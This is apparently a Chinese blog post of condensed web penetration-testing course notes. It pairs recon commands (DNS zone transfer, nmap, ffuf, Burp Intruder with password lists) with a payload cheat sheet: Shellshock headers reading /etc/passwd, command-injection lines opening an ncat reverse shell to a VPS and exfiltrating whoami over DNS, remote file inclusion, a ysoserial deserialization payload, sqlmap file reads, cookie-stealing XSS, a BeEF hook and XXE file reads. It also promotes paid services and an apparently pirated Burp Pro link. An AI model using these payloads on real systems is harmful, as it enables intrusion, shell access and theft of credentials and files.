web安全测试实验室省流版本(完整名请用base64解码):c2VjNTQyIFdFQiBBUFAgUEVORVRSQVRJT04gVEVTVElORyAmIEVUSElDQUwgSEFDS0lORw==

如果对以下内容有任何困难,请留言,支持付费服务与其他问题交流

  • burpsuite工具专业版
    https://t.[m]e/zer0day1ab

  • 虚拟主机发现
    dig

dig demo.org -t any
dig demo.org -t axfr @127.0.0.1  # @直接指定 bind 服务器,不走 DNS 查询的默认行为

dnsrecon.py

dnsrecon.py -t brt -d demo.org -n 127.0.0.1 -D /opt/dnsrecon/namelist.txt

Nmap 和 dns-brute NSE 脚本

nmap -- script=dns-brute demo.org

在线DNS数据库查询:https://dnsdumpster.com demo.org

证书透明度:https://crt.sh %.demo.org 如果你不抄袭,从来不会想到使用通配符

nmap -p 443 --script=ssl-enum-ciphers www.demo.org -oN /tmp/www.demo.org.nmap
nmap --script-help ssl-enum-ciphers | less
grep "\- C" /tmp/www.demo.org.nmap
  • 收集服务器信息
nmap -sV demo.org
cd /usr/share/nmap/scripts
ls

旧OSS跟踪(及供应链依赖旧版本)Retire.js
bp扩展 - bapp商店 - Retire.js

  • 心脏出血
    泄露账号密码,cookie等敏感信息
nmap -p 443 -sV --script ssl-heartbleed www.demo.org
.*?portswigger.net$   # 正则语法,发现子域名

图片

其他参考值
图片

target - URL view 查看爬虫结果
图片

创建关键词字典
cewl http://demo.org

  • 强制浏览
ffuf -w /opt/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-
directories.txt -u http://www.demo.net/FUZZ
  • POST与GET
    将POST失败的利用全部换成GET

  • 用户名枚举
    人口普查报告前TOP姓氏列表

  • Burp Intruder fuzz
    /seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt

  • Burp Sequencer
    start live capture实时捕获采集样本(参考值:几百到几万)
    绿色表示熵足够,难以预测(与之相反是全红)

  • cgi-bin 与 Shellshock

User-Agent: () { 42;};echo;/bin/cat /etc/passwd
User-Agent: () { 42;};echo;/usr/bin/id
  • 命令注入
基线值; cat /etc/passwd
基线值; id
基线值; ncat VPS 1337 -e /bin/bash   # nc -lvvnp 1337
基线值; ping -c3 VPS
基线值;a=$(whoami|base32|tr -d =);nslookup   # $a.xxxxxxx.oastify.com    echo dsadsads= | base32 -d

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

  • 文件包含
page=http://vps/id.php    # <?php echo shell_exec('id');?>  
  • 不安全的反序列化
    这个实验不切实际,但工具的使用可以借鉴
java -jar /usr/local/bin/ysoserial-master-SNAPSHOT.jar
java -jar /usr/local/bin/ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cp /1.txt /opt/app/files/1.html' > deser.obj  # 调试 CommonsCollections5  对应的 java7 版本
base64 deser.obj > deser.b64
POST提交到漏洞端点,还需要对象名比如 name=payload
  • 基于错误的SQL注入
    不要学什么使得payload在数据库中被执行,对实际挖洞没什么帮助
    fuzz字典如何使用心法:
    1.提交基线值:test 返回真
    2.提交语义分割符:test' 返回假,并且报错SQL语法错误(需要对比提交基线值:test 返回真的情况(长度,手动看响应,时延))
    3.test' OR 1=1;# 返回真,感觉在WHERE环境中(返回假的时候,需要把它修正,找到一条明确的payload,而不是fuzz之后看这看那)
    基线值' OR '1'='1
sqlmap -r 1.txt --proxy http://localhost:8080 --batch -p id --level 3 --user-agent 42 --dbs 
-D sqli --tables
-D sqli -T Customers --count
--file-read /etc/passwd

  • HTML注入
<img src="https://demo.org/1.jpg">
<iframe src="https://
<script>window.location="https://"</script>
<script>alert("XSS")</script>
<script>alert(document.cookie)</script>

BeEF C2 :Browser Commands(绿色操作用户看不到,橙色操作用户可能看不到,白色不确认,红色无法操作)
http://127.0.0.1:3000/hook.js (攻击者浏览器重定向到hook.js页面之外,浏览器会显示下线)

  • 基于DOM XSS
    与反射XSS类似
<img src="https://demo.org/1.jpg">
<iframe src="https://
<script>window.location="https://"</script>
<script>alert("XSS")</script>
<script>alert(document.cookie)</script>
  • SSRF
    url=http://vps

  • XXE
    外部实体

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "test" >]>     
## <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 
## <!ENTITY xxe SYSTEM "http://vps" >]>
## <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://vps/" >]>   访问vps HTML页面并base64编码
## <!ENTITY xxe SYSTEM "expect://id" >]>
<entry>
<subject>&xxe;</subject>
<category>aaa</category>
<text>bbb</text>
</entry>
  • CSRF
    burp官网一把梭

  • python与Requests 库

proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
verify = False
  • WPScan 和 ExploitDB
    类似于关键字与nuclei全网poc模板搜索

  • Nuclei 和 Jenkins
    登录后的nuclei

nuclei -u http://demo.org:9000 -H '<PASTE YOUR SESSION COOKIE HERE>'
posted @ 2026-04-19 16:05  sec875  阅读(16)  评论(0)    收藏  举报